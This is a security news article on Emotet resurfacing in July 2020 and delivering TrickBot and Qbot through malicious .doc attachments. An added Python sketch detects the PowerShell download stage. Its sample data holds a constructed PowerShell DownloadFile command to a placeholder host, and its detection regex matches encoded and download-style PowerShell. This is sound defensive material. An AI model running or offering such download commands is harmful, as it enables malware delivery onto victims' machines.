Emotet Re-emerges After 5-Month Absence
Researchers found a sharp increase in Emotet activity after 5 months of inactivity. Emotet steals banking credentials and spreads inside targeted networks. Emotet is first in Check Point Technologies' Global Threat Index, impacting 5% of organizations globally. Beginning in February 2020, Emotet's spam campaign slowed down and eventually stopped, but its activity started to increase again in July. This is similar to what happened in 2019, when the Emotet botnet stopped activity during the summer but resumed in September.
Emotet infects its victims with TrickBot and Qbot, which are used to steal banking credentials and spread inside networks. Some of the spam campaigns contained malicious .doc files with names like form.doc or invoice.doc. According to researchers, the malicious attachment launches a PowerShell script that downloads the Emotet binary from remote websites and infects the machine, adding it to the botnet. The resumption of Emotet's activities highlights the scale and power of the botnet globally.
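The delivery chain described above (a .doc attachment followed by a PowerShell download) can be hunted for in process-creation telemetry. The following is an added example, not code from the article or the researchers it cites: the events are constructed, and the Word process name, the two-minute correlation window and both patterns are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events: (host, time, image, command line).
# Illustrative sample data only, not real telemetry or real indicators.
EVENTS = [
    ("WS01", "2020-07-20T09:00:05", "WINWORD.EXE", r'"WINWORD.EXE" /n "C:\Users\a\Downloads\invoice.doc"'),
    ("WS01", "2020-07-20T09:00:19", "powershell.exe", "powershell -w hidden -enc <constructed-blob>"),
    ("WS02", "2020-07-20T09:10:00", "WINWORD.EXE", r'"WINWORD.EXE" /n "C:\Users\b\Documents\notes.doc"'),
    ("WS03", "2020-07-20T10:00:00", "powershell.exe", "powershell -File C:\\Scripts\\backup.ps1"),
    ("WS04", "2020-07-20T11:00:00", "WINWORD.EXE", r'"WINWORD.EXE" /n "C:\Users\c\Downloads\form.doc"'),
    ("WS04", "2020-07-20T11:30:00", "powershell.exe",
     "powershell -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/x','x.exe')"),
]

# Assumption: Word is started with the .doc path as its last argument.
DOC_RE = re.compile(r'([^\\"]+\.doc)"?\s*$', re.I)
# Assumption: encoded commands and download calls mark the PowerShell stage.
SUSPICIOUS_RE = re.compile(
    r"-enc|downloadfile|downloadstring|invoke-webrequest|https?://", re.I)


def triage(events, window=timedelta(minutes=2)):
    """Return (host, severity, document) for each suspicious PowerShell start.

    Severity is "high" when the same host opened a .doc within `window`
    before the PowerShell start, otherwise "medium" with no document.
    """
    last_doc = {}  # host -> (time opened, document name)
    alerts = []
    for host, ts, image, cmd in sorted(events, key=lambda e: e[1]):
        when = datetime.fromisoformat(ts)
        if image.lower() == "winword.exe":
            match = DOC_RE.search(cmd)
            if match:
                last_doc[host] = (when, match.group(1))
        elif image.lower() == "powershell.exe" and SUSPICIOUS_RE.search(cmd):
            opened = last_doc.get(host)
            linked = opened is not None and when - opened[0] <= window
            alerts.append((host, "high" if linked else "medium",
                           opened[1] if linked else None))
    return alerts


if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```

A download-style PowerShell start with no recent document open is still reported at lower severity, because the attachment may have been opened outside the window or through a process this sketch does not track.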
Before stopping its activities in February, Emotet was the largest, most active, and most sophisticated cybercrime operation. The Emotet gang operates an email spam infrastructure used to infect victims with the Emotet trojan. It then uses this to deploy other malware, either for its own interest or for other cybercriminal groups who rent access to infected hosts.
Since returning from an extended vacation, Emotet email campaigns are once again the most prevalent threat. The group behind Emotet introduced code changes to their malware, such as updates to the email sending module, and picked up a new affiliate payload to distribute Qbot. Emotet remains a highly dangerous threat. Companies and organizations that are infected with Emotet should isolate the infected system and take their entire network offline to prevent the delivery of a ransomware payload.